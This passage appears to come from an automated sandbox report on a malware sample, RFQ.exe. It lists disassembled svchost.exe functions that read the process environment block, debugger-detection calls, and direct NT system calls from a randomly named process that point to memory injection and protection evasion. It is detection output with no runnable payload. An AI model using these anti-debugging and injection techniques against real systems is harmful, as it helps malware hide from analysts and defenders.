                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0316E443 mov eax, dword ptr fs:[00000030h] | 1_2_0316E443
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0315A470 mov eax, dword ptr fs:[00000030h] | 1_2_0315A470
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0315A470 mov eax, dword ptr fs:[00000030h] | 1_2_0315A470
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0315A470 mov eax, dword ptr fs:[00000030h] | 1_2_0315A470
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_031BC460 mov ecx, dword ptr fs:[00000030h] | 1_2_031BC460
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_031EA49A mov eax, dword ptr fs:[00000030h] | 1_2_031EA49A
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_031644B0 mov ecx, dword ptr fs:[00000030h] | 1_2_031644B0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_031BA4B0 mov eax, dword ptr fs:[00000030h] | 1_2_031BA4B0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_031364AB mov eax, dword ptr fs:[00000030h] | 1_2_031364AB
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_031304E5 mov ecx, dword ptr fs:[00000030h] | 1_2_031304E5
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_031AEB1D mov eax, dword ptr fs:[00000030h] | 1_2_031AEB1D
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_031AEB1D mov eax, dword ptr fs:[00000030h] | 1_2_031AEB1D
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_031AEB1D mov eax, dword ptr fs:[00000030h] | 1_2_031AEB1D
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_031AEB1D mov eax, dword ptr fs:[00000030h] | 1_2_031AEB1D
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_031AEB1D mov eax, dword ptr fs:[00000030h] | 1_2_031AEB1D
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_031AEB1D mov eax, dword ptr fs:[00000030h] | 1_2_031AEB1D
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_031AEB1D mov eax, dword ptr fs:[00000030h] | 1_2_031AEB1D
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_031AEB1D mov eax, dword ptr fs:[00000030h] | 1_2_031AEB1D
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_031AEB1D mov eax, dword ptr fs:[00000030h] | 1_2_031AEB1D
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03204B00 mov eax, dword ptr fs:[00000030h] | 1_2_03204B00
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0315EB20 mov eax, dword ptr fs:[00000030h] | 1_2_0315EB20
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0315EB20 mov eax, dword ptr fs:[00000030h] | 1_2_0315EB20
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_031F8B28 mov eax, dword ptr fs:[00000030h] | 1_2_031F8B28
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_031F8B28 mov eax, dword ptr fs:[00000030h] | 1_2_031F8B28
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03128B50 mov eax, dword ptr fs:[00000030h] | 1_2_03128B50
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_031DEB50 mov eax, dword ptr fs:[00000030h] | 1_2_031DEB50
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_031E4B4B mov eax, dword ptr fs:[00000030h] | 1_2_031E4B4B
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_031E4B4B mov eax, dword ptr fs:[00000030h] | 1_2_031E4B4B
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_031C6B40 mov eax, dword ptr fs:[00000030h] | 1_2_031C6B40
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_031C6B40 mov eax, dword ptr fs:[00000030h] | 1_2_031C6B40
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_031FAB40 mov eax, dword ptr fs:[00000030h] | 1_2_031FAB40
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_031D8B42 mov eax, dword ptr fs:[00000030h] | 1_2_031D8B42
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0312CB7E mov eax, dword ptr fs:[00000030h] | 1_2_0312CB7E
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03202B57 mov eax, dword ptr fs:[00000030h] | 1_2_03202B57
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03202B57 mov eax, dword ptr fs:[00000030h] | 1_2_03202B57
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03202B57 mov eax, dword ptr fs:[00000030h] | 1_2_03202B57
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03202B57 mov eax, dword ptr fs:[00000030h] | 1_2_03202B57
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03140BBE mov eax, dword ptr fs:[00000030h] | 1_2_03140BBE
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03140BBE mov eax, dword ptr fs:[00000030h] | 1_2_03140BBE
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_031E4BB0 mov eax, dword ptr fs:[00000030h] | 1_2_031E4BB0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_031E4BB0 mov eax, dword ptr fs:[00000030h] | 1_2_031E4BB0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_031DEBD0 mov eax, dword ptr fs:[00000030h] | 1_2_031DEBD0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03150BCB mov eax, dword ptr fs:[00000030h] | 1_2_03150BCB
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03150BCB mov eax, dword ptr fs:[00000030h] | 1_2_03150BCB
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03150BCB mov eax, dword ptr fs:[00000030h] | 1_2_03150BCB
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03130BCD mov eax, dword ptr fs:[00000030h] | 1_2_03130BCD
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03130BCD mov eax, dword ptr fs:[00000030h] | 1_2_03130BCD
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03130BCD mov eax, dword ptr fs:[00000030h] | 1_2_03130BCD
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03138BF0 mov eax, dword ptr fs:[00000030h] | 1_2_03138BF0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03138BF0 mov eax, dword ptr fs:[00000030h] | 1_2_03138BF0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03138BF0 mov eax, dword ptr fs:[00000030h] | 1_2_03138BF0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0315EBFC mov eax, dword ptr fs:[00000030h] | 1_2_0315EBFC
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_031BCBF0 mov eax, dword ptr fs:[00000030h] | 1_2_031BCBF0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_031BCA11 mov eax, dword ptr fs:[00000030h] | 1_2_031BCA11
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03154A35 mov eax, dword ptr fs:[00000030h] | 1_2_03154A35
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03154A35 mov eax, dword ptr fs:[00000030h] | 1_2_03154A35
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0316CA24 mov eax, dword ptr fs:[00000030h] | 1_2_0316CA24
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0315EA2E mov eax, dword ptr fs:[00000030h] | 1_2_0315EA2E
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03136A50 mov eax, dword ptr fs:[00000030h] | 1_2_03136A50
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03136A50 mov eax, dword ptr fs:[00000030h] | 1_2_03136A50
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03136A50 mov eax, dword ptr fs:[00000030h] | 1_2_03136A50
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03136A50 mov eax, dword ptr fs:[00000030h] | 1_2_03136A50
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03136A50 mov eax, dword ptr fs:[00000030h] | 1_2_03136A50
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03136A50 mov eax, dword ptr fs:[00000030h] | 1_2_03136A50
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03136A50 mov eax, dword ptr fs:[00000030h] | 1_2_03136A50
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03140A5B mov eax, dword ptr fs:[00000030h] | 1_2_03140A5B
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03140A5B mov eax, dword ptr fs:[00000030h] | 1_2_03140A5B
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_031ACA72 mov eax, dword ptr fs:[00000030h] | 1_2_031ACA72
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_031ACA72 mov eax, dword ptr fs:[00000030h] | 1_2_031ACA72
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0316CA6F mov eax, dword ptr fs:[00000030h] | 1_2_0316CA6F
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0316CA6F mov eax, dword ptr fs:[00000030h] | 1_2_0316CA6F
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0316CA6F mov eax, dword ptr fs:[00000030h] | 1_2_0316CA6F
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_031DEA60 mov eax, dword ptr fs:[00000030h] | 1_2_031DEA60
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03168A90 mov edx, dword ptr fs:[00000030h] | 1_2_03168A90
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0313EA80 mov eax, dword ptr fs:[00000030h] | 1_2_0313EA80
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0313EA80 mov eax, dword ptr fs:[00000030h] | 1_2_0313EA80
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0313EA80 mov eax, dword ptr fs:[00000030h] | 1_2_0313EA80
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0313EA80 mov eax, dword ptr fs:[00000030h] | 1_2_0313EA80
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0313EA80 mov eax, dword ptr fs:[00000030h] | 1_2_0313EA80
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0313EA80 mov eax, dword ptr fs:[00000030h] | 1_2_0313EA80
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0313EA80 mov eax, dword ptr fs:[00000030h] | 1_2_0313EA80
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0313EA80 mov eax, dword ptr fs:[00000030h] | 1_2_0313EA80
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0313EA80 mov eax, dword ptr fs:[00000030h] | 1_2_0313EA80
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03204A80 mov eax, dword ptr fs:[00000030h] | 1_2_03204A80
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03138AA0 mov eax, dword ptr fs:[00000030h] | 1_2_03138AA0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03138AA0 mov eax, dword ptr fs:[00000030h] | 1_2_03138AA0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03186AA4 mov eax, dword ptr fs:[00000030h] | 1_2_03186AA4
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03130AD0 mov eax, dword ptr fs:[00000030h] | 1_2_03130AD0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03164AD0 mov eax, dword ptr fs:[00000030h] | 1_2_03164AD0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03164AD0 mov eax, dword ptr fs:[00000030h] | 1_2_03164AD0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03186ACC mov eax, dword ptr fs:[00000030h] | 1_2_03186ACC
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03186ACC mov eax, dword ptr fs:[00000030h] | 1_2_03186ACC
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03186ACC mov eax, dword ptr fs:[00000030h] | 1_2_03186ACC
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0316AAEE mov eax, dword ptr fs:[00000030h] | 1_2_0316AAEE
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0316AAEE mov eax, dword ptr fs:[00000030h] | 1_2_0316AAEE
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_031BC912 mov eax, dword ptr fs:[00000030h] | 1_2_031BC912
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03128918 mov eax, dword ptr fs:[00000030h] | 1_2_03128918
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03128918 mov eax, dword ptr fs:[00000030h] | 1_2_03128918
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_031AE908 mov eax, dword ptr fs:[00000030h] | 1_2_031AE908
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_031AE908 mov eax, dword ptr fs:[00000030h] | 1_2_031AE908
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_031B892A mov eax, dword ptr fs:[00000030h] | 1_2_031B892A
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_031C892B mov eax, dword ptr fs:[00000030h] | 1_2_031C892B
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_031B0946 mov eax, dword ptr fs:[00000030h] | 1_2_031B0946
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03204940 mov eax, dword ptr fs:[00000030h] | 1_2_03204940
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_031D4978 mov eax, dword ptr fs:[00000030h] | 1_2_031D4978
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_031D4978 mov eax, dword ptr fs:[00000030h] | 1_2_031D4978
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_031BC97C mov eax, dword ptr fs:[00000030h] | 1_2_031BC97C
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03156962 mov eax, dword ptr fs:[00000030h] | 1_2_03156962
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03156962 mov eax, dword ptr fs:[00000030h] | 1_2_03156962
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03156962 mov eax, dword ptr fs:[00000030h] | 1_2_03156962
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0317096E mov eax, dword ptr fs:[00000030h] | 1_2_0317096E
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0317096E mov edx, dword ptr fs:[00000030h] | 1_2_0317096E
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0317096E mov eax, dword ptr fs:[00000030h] | 1_2_0317096E
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_031B89B3 mov esi, dword ptr fs:[00000030h] | 1_2_031B89B3
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_031B89B3 mov eax, dword ptr fs:[00000030h] | 1_2_031B89B3
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_031B89B3 mov eax, dword ptr fs:[00000030h] | 1_2_031B89B3
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_031429A0 mov eax, dword ptr fs:[00000030h] | 1_2_031429A0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_031429A0 mov eax, dword ptr fs:[00000030h] | 1_2_031429A0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_031429A0 mov eax, dword ptr fs:[00000030h] | 1_2_031429A0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_031429A0 mov eax, dword ptr fs:[00000030h] | 1_2_031429A0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_031429A0 mov eax, dword ptr fs:[00000030h] | 1_2_031429A0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_031429A0 mov eax, dword ptr fs:[00000030h] | 1_2_031429A0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_031429A0 mov eax, dword ptr fs:[00000030h] | 1_2_031429A0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_031429A0 mov eax, dword ptr fs:[00000030h] | 1_2_031429A0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_031429A0 mov eax, dword ptr fs:[00000030h] | 1_2_031429A0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_031429A0 mov eax, dword ptr fs:[00000030h] | 1_2_031429A0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_031429A0 mov eax, dword ptr fs:[00000030h] | 1_2_031429A0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_031429A0 mov eax, dword ptr fs:[00000030h] | 1_2_031429A0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_031429A0 mov eax, dword ptr fs:[00000030h] | 1_2_031429A0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_031309AD mov eax, dword ptr fs:[00000030h] | 1_2_031309AD
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_031309AD mov eax, dword ptr fs:[00000030h] | 1_2_031309AD
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0313A9D0 mov eax, dword ptr fs:[00000030h] | 1_2_0313A9D0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0313A9D0 mov eax, dword ptr fs:[00000030h] | 1_2_0313A9D0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0313A9D0 mov eax, dword ptr fs:[00000030h] | 1_2_0313A9D0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0313A9D0 mov eax, dword ptr fs:[00000030h] | 1_2_0313A9D0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0313A9D0 mov eax, dword ptr fs:[00000030h] | 1_2_0313A9D0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0313A9D0 mov eax, dword ptr fs:[00000030h] | 1_2_0313A9D0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_031649D0 mov eax, dword ptr fs:[00000030h] | 1_2_031649D0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_031FA9D3 mov eax, dword ptr fs:[00000030h] | 1_2_031FA9D3
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_031C69C0 mov eax, dword ptr fs:[00000030h] | 1_2_031C69C0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_031629F9 mov eax, dword ptr fs:[00000030h] | 1_2_031629F9
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_031629F9 mov eax, dword ptr fs:[00000030h] | 1_2_031629F9
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_031BE9E0 mov eax, dword ptr fs:[00000030h] | 1_2_031BE9E0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_031BC810 mov eax, dword ptr fs:[00000030h] | 1_2_031BC810
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03152835 mov eax, dword ptr fs:[00000030h] | 1_2_03152835
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03152835 mov eax, dword ptr fs:[00000030h] | 1_2_03152835
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03152835 mov eax, dword ptr fs:[00000030h] | 1_2_03152835
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03152835 mov ecx, dword ptr fs:[00000030h] | 1_2_03152835
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03152835 mov eax, dword ptr fs:[00000030h] | 1_2_03152835
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03152835 mov eax, dword ptr fs:[00000030h] | 1_2_03152835
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0316A830 mov eax, dword ptr fs:[00000030h] | 1_2_0316A830
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_031D483A mov eax, dword ptr fs:[00000030h] | 1_2_031D483A
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_031D483A mov eax, dword ptr fs:[00000030h] | 1_2_031D483A
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03160854 mov eax, dword ptr fs:[00000030h] | 1_2_03160854
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03134859 mov eax, dword ptr fs:[00000030h] | 1_2_03134859
                Source: C:\Users\user\Desktop\RFQ.exe | Code function: 0_2_006E0AA6 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree, | 0_2_006E0AA6
                Source: C:\Users\user\Desktop\RFQ.exe | Code function: 0_2_006B25B2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, | 0_2_006B25B2
                Source: C:\Users\user\Desktop\RFQ.exe | Code function: 0_2_006A07BF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, | 0_2_006A07BF
                Source: C:\Users\user\Desktop\RFQ.exe | Code function: 0_2_006A0955 SetUnhandledExceptionFilter, | 0_2_006A0955
                Source: C:\Users\user\Desktop\RFQ.exe | Code function: 0_2_006A0BA1 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, | 0_2_006A0BA1

                HIPS / PFW / Operating System Protection Evasion

                Source: C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exe | NtWriteVirtualMemory: Direct from: 0x76F0490C
                Source: C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exe | NtAllocateVirtualMemory: Direct from: 0x76F03C9C
                Source: C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exe | NtClose: Direct from: 0x76F02B6C
                Source: C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exe | NtReadVirtualMemory: Direct from: 0x76F02E8C
                Source: C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exe | NtCreateKey: Direct from: 0x76F02C6C
                Source: C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exe | NtSetInformationThread: Direct from: 0x76F02B4C
                Source: C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exe | NtQueryAttributesFile: Direct from: 0x76F02E6C
                Source: C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exe | NtAllocateVirtualMemory: Direct from: 0x76F048EC
                Source: C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exe | NtQuerySystemInformation: Direct from: 0x76F048CC
                Source: C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exe | NtQueryVolumeInformationFile: Direct from: 0x76F02F2C
                Source: C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exe | NtOpenSection: Direct from: 0x76F02E0C
                Source: C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exe | NtSetInformationThread: Direct from: 0x76EF63F9
                Source: C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exe | NtDeviceIoControlFile: Direct from: 0x76F02AEC
                Source: C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exe | NtAllocateVirtualMemory: Direct from: 0x76F02BEC
                Source: C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exe | NtCreateFile: Direct from: 0x76F02FEC
                Source: C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exe | NtOpenFile: Direct from: 0x76F02DCC
                Source: C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exe | NtQueryInformationToken: Direct from: 0x76F02CAC
                Source: C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exe | NtTerminateThread: Direct from: 0x76F02FCC
                Source: C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exe | NtProtectVirtualMemory: Direct from: 0x76EF7B2E
                Source: C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exe | NtOpenKeyEx: Direct from: 0x76F02B9C
                Source: C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exe | NtProtectVirtualMemory: Direct from: 0x76F02F9C
                Source: C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exe | NtSetInformationProcess: Direct from: 0x76F02C5C
                Source: C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exe | NtNotifyChangeKey: Direct from: 0x76F03C2C
                Source: C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exe | NtCreateMutant: Direct from: 0x76F035CC
                Source: C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exe | NtWriteVirtualMemory: Direct from: 0x76F02E3C
                Source: C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exeNtMapViewOfSection: Direct from: 0x76F02D1CJump to behavior
                Source: C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exeNtResumeThread: Direct from: 0x76F036ACJump to behavior
                Source: C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exeNtAllocateVirtualMemory: Direct from: 0x76F02BFCJump to behavior
